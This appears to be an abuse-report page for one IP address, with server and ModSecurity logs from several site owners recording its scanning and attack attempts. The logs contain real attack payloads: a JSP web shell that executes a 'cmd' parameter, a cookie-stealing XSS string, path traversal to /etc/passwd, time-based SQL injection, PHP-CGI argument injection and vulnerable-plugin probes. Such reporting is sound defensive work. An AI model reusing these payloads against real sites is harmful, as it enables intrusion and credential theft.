Anonymous
2026-09-30 11:40:21
(2 hours ago)
Web App Attack using loopback
Web App Attack
๐ฎ๐ฑ
spd.co.il
2026-09-29 23:07:21
(14 hours ago)
Web application attack detected
Hacking
Web App Attack
๐ซ๐ท
SpaceHost-Server
2026-09-29 22:29:27
(15 hours ago)
Brute-Force
Web App Attack
๐ซ๐ท
Baking333
2026-09-29 20:07:38
(17 hours ago)
[redacted] 85.137.56.196 - - [29/Sep/2026:21:07:35 +0100] "GET /wp-content/plugins/anti-plagiarism/[ ...
show more
[redacted] 85.137.56.196 - - [29/Sep/2026:21:07:35 +0100] "GET /wp-content/plugins/anti-plagiarism/[redacted] HTTP/1.1" 302 6726 0/45782 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15" [redacted] 85.137.56.196 - - [29/Sep/2026:21:07:36 +0100] "GET /wp-content/plugins/e-search/[redacted] HTTP/1.1" 302 1499 0/39690 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
show less
Bad Web Bot
Web App Attack
๐ช๐ธ
el-brujo
2026-09-29 12:57:59
(1 day ago)
DDoS Attack Layer 7
DDoS Attack
๐ช๐ธ
el-brujo
2026-09-29 12:18:26
(1 day ago)
29/Sep/2026:14:18:25.993691 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
29/Sep/2026:14:18:25.993691 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 85.137.56.196] ModSecurity: Warning. Pattern match ".*\\\\\\\\.(?:php\\\\\\\\d*|phtml)\\\\\\\\.*$" at FILES:files[]. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "108"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: dbdbda.php found within FILES:files[]: dbdbda.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/242"] [hostname "elhacker.info"] [uri "/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"] [unique_id "aruskdMnrgJohGFisO7aFgAABVc"]
...
show less
Hacking
Web App Attack
๐ช๐ธ
el-brujo
2026-09-29 09:49:43
(1 day ago)
29/Sep/2026:11:49:42.785371 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
29/Sep/2026:11:49:42.785371 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 85.137.56.196] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "56"] [id "941100"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: XSS data found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/242"] [hostname "elhacker.info"] [uri "/webadmin/pkg"] [unique_id "aruJtqfPB3cBPdYWCQvIqgAABGs"]
...
show less
Hacking
Web App Attack
๐ฉ๐ช
macrob
2026-09-29 06:37:14
(1 day ago)
2026/09/29 06:37:12 [error] 538677#538677: *47975359 access forbidden by rule, client: 85.137.56.196 ...
show more
2026/09/29 06:37:12 [error] 538677#538677: *47975359 access forbidden by rule, client: 85.137.56.196, server: binixo-vn.com, request: "GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/2.0", host: "binixo-vn.com"
2026/09/29 06:37:12 [error] 538679#538679: *47975361 access forbidden by rule, client: 85.137.56.196, server: binixo-vn.com, request: "GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/2.0", host: "binixo-vn.com"
2026/09/29 06:37:12 [error] 538679#538679: *47975361 access forbidden by rule, client: 85.137.56.196, server: binixo-vn.com, request: "GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/2.0", host: "binixo-vn.com"
...
show less
Web App Attack
๐ช๐ธ
el-brujo
2026-09-29 06:27:42
(1 day ago)
29/Sep/2026:08:27:41.439543 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
29/Sep/2026:08:27:41.439543 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 85.137.56.196] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_BODY. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "392"] [id "920240"] [msg "URL Encoding Abuse Attack Attempt"] [data "<%@ page import=\\\\x22java.util.*,java.io.*\\\\x22%>\\\\x0d\\\\x0a<%\\\\x0d\\\\x0aif (request.getParameter(\\\\x22cmd\\\\x22) != null) {\\\\x0d\\\\x0a out.println(\\\\x22Command: \\\\x22 + request.getParameter(\\\\x22cmd\\\\x22) + \\\\x22<BR>\\\\x22);\\\\x0d\\\\x0a Process p = Runtime.getRuntime().exec(request.getParameter(\\\\x22cmd\\\\x22));\\\\x0d\\\\x0a OutputStream os = p.getOutputStream();\\\\x0d\\\\x0a InputStream in = p.getInputStream();\\\\x0d\\\\x0a DataInputStream dis = new DataInputStream(in);\\\\x0d\\\\x0a String disr = dis.readLin..."] [severity "WARNING"] [ver "OWASP_
...
show less
Hacking
Web App Attack
๐ฌ๐ง
openstrike.co.uk
2026-09-29 05:13:17
(1 day ago)
5 attacks on deployment descriptor URLs:
GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web ...
show more
5 attacks on deployment descriptor URLs:
GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1
show less
Hacking
๐ฉ๐ช
macrob
2026-09-29 04:48:23
(1 day ago)
2026/09/29 04:48:21 [error] 538681#538681: *47737361 access forbidden by rule, client: 85.137.56.196 ...
show more
2026/09/29 04:48:21 [error] 538681#538681: *47737361 access forbidden by rule, client: 85.137.56.196, server: binixo-vn.com, request: "GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/2.0", host: "binixo-vn.com"
2026/09/29 04:48:21 [error] 538681#538681: *47737364 access forbidden by rule, client: 85.137.56.196, server: binixo-vn.com, request: "GET /wp-content/plugins/e-search/readme.txt HTTP/2.0", host: "binixo-vn.com"
2026/09/29 04:48:22 [error] 538681#538681: *47737368 access forbidden by rule, client: 85.137.56.196, server: binixo-vn.com, request: "GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/2.0", host: "binixo-vn.com"
...
show less
Web App Attack
๐ช๐ธ
el-brujo
2026-09-29 03:42:49
(1 day ago)
29/Sep/2026:05:42:49.095803 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
29/Sep/2026:05:42:49.095803 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 85.137.56.196] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "703"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [hostname "elhacker.info"] [uri "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"] [unique_id "arszucGdgr0pGiQ3Rdaq7QAAATU"]
...
show less
Hacking
Web App Attack
๐ฉ๐ช
macrob
2026-09-29 02:55:22
(1 day ago)
2026/09/29 02:55:21 [error] 538679#538679: *47503434 access forbidden by rule, client: 85.137.56.196 ...
show more
2026/09/29 02:55:21 [error] 538679#538679: *47503434 access forbidden by rule, client: 85.137.56.196, server: binixo-vn.com, request: "POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/2.0", host: "binixo-vn.com"
2026/09/29 02:55:21 [error] 538679#538679: *47503451 access forbidden by rule, client: 85.137.56.196, server: binixo-vn.com, request: "GET /wp-login.php HTTP/2.0", host: "binixo-vn.com"
2026/09/29 02:55:21 [error] 538679#538679: *47503448 access forbidden by rule, client: 85.137.56.196, server: binixo-vn.com, request: "GET /wp-content/plugins/sourceafrica/readme.txt HTTP/2.0", host: "binixo-vn.com"
...
show less
Web App Attack
๐ช๐ธ
el-brujo
2026-09-29 02:07:04
(1 day ago)
29/Sep/2026:04:07:04.662816 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
29/Sep/2026:04:07:04.662816 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 85.137.56.196] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "703"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [hostname "elhacker.info"] [uri "/wp-content/plugins/wsecure/wsecure-config.php"] [unique_id "arsdSNo2WLQuhj916sqSFAAAA6k"]
...
show less
Hacking
Web App Attack
Anonymous
2026-09-29 00:27:11
(1 day ago)
85.137.56.196 rolistore.com - [28/Sep/2026:18:27:09 -0600] "GET /etc/passwd HTTP/1.1" 400 162 "-" "- ...
show more
85.137.56.196 rolistore.com - [28/Sep/2026:18:27:09 -0600] "GET /etc/passwd HTTP/1.1" 400 162 "-" "-"\n85.137.56.196 rolistore.com - [28/Sep/2026:18:27:09 -0600] "GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1" 400 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0"\n85.137.56.196 rolistore.com - [28/Sep/2026:18:27:09 -0600] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1" 403 158 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"\n85.137.56.196 rolistore.com - [28/Sep/2026:18:27:09 -0600] "POST /_search?pretty HTTP/1.1" 403 158 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.25"\n85.137.56.196 rolistore.com - [28/Sep/2026:18:27:10 -0600] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dp
show less
DDoS Attack
Web App Attack